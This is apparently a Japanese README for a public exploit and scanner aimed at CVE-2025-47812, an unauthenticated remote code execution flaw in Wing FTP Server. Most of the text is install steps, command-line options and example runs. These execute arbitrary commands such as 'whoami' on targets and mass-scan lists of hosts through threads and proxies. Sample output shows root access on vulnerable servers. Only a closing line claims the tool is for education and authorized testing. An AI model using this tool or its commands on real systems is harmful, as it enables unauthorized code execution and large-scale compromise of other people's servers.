
CVE-2025-47812 のエクスプロイトおよびスキャナーで、Wing FTP Server の認証なしリモートコード実行を標的とし、単一ターゲット、大量スキャン、プロキシ、複数の出力形式に対応しています。
Wing FTP Server CVE-2025-47812 の改良版エクスプロイト - 未認証リモートコード実行 (RCE)
このリポジトリをクローンし、ディレクトリに移動します:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
または、CVE-2025-47812.py スクリプトをダウンロードして実行するだけです。
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Wing FTP Server CVE-2025-47812 のエクスプロイト - 改良版
オプション:
-h, --help このヘルプメッセージを表示
-u URL, --url URL ターゲットURL (例: http://192.168.1.100:5466)
-f FILE, --file FILE URLリストを含むファイル(1行に1URL)
-c COMMAND, --command COMMAND
実行するコマンド (デフォルト: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
ユーザー名 (デフォルト: anonymous)
-P PASSWORD, --password PASSWORD
パスワード (デフォルト: 空)
--check 確認モード: 脆弱性があるかどうかのみチェック(無害なコマンドを使用)
-v, --verbose 詳細モード(詳細を表示)
--proxy PROXY プロキシ (例: http://127.0.0.1:8080)
--timeout TIMEOUT タイムアウト(秒) (デフォルト: 10)
-o OUTPUT, --output OUTPUT
結果を保存する出力ファイル
--output-format {txt,json,csv}
出力形式 (デフォルト: txt)
--threads THREADS 複数のターゲットをスキャンするスレッド数 (デフォルト: 5)
--no-progress プログレスバーを非表示
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
ファイルには1行に1つのURLを含める必要があります。例:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
http://192.168.1.10:5466 - VULNERABLE - ユーザー: root
http://192.168.1.11:5466 - SEGURO - 脆弱性なし
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "ユーザー: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,ユーザー: root
このエクスプロイトは教育目的および許可されたセキュリティテスト専用に設計されています。明示的な同意なしにシステムに対してこのツールを無断使用することは違法であり、重大な法的結果を招く可能性があります。作者は悪用について一切の責任を負いません。
この作業が気に入ったら、GitHubで⭐スターを付けるのをお忘れなく!
このプロジェクトはMITライセンスの下でライセンスされています – 詳細はLICENSEファイルを参照してください。